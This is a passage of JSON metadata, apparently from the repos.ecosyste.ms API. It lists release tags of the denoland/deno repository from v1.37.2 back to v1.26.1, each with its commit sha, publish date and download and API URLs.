v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/mani